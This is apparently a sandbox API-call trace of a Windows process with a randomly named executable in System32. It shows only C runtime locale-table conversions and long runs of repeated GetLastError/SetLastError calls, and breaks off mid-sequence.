MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x16f1b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0034.702] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x16f44c | out: lpCharType=0x16f44c) returned 1 [0034.702] GetLastError () returned 0x0 [0034.702] SetLastError (dwErrCode=0x0) [0034.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x16f188, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.703] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.703] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ef78, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f74c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¨Þ§ô\x84ù\x16", lpUsedDefaultChar=0x0) returned 256 [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f84c, cbMultiByte=256, lpWideCharStr=0x16f1a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.703] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.703] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ef98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f64c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¨Þ§ô\x84ù\x16", lpUsedDefaultChar=0x0) returned 256 [0034.703] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.703] GetLastError () returned 0x0 [0034.703] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.704] SetLastError (dwErrCode=0x0) [0034.704] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.705] GetLastError () returned 0x0 [0034.705] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.706] GetLastError () returned 0x0 [0034.706] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.707] SetLastError (dwErrCode=0x0) [0034.707] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.708] SetLastError (dwErrCode=0x0) [0034.708] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.709] SetLastError (dwErrCode=0x0) [0034.709] GetLastError () returned 0x0 [0034.716] SetLastError (dwErrCode=0x0) [0034.716] GetLastError () returned 0x0 [0034.716] SetLastError (dwErrCode=0x0) [0034.716] GetLastError () returned 0x0 [0034.716] SetLastError (dwErrCode=0x0) [0034.716] GetLastError () returned 0x0 [0034.716] SetLastError (dwErrCode=0x0) [0034.716] GetLastError () returned 0x0 [0034.716] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.717] SetLastError (dwErrCode=0x0) [0034.717] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.718] SetLastError (dwErrCode=0x0) [0034.718] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] 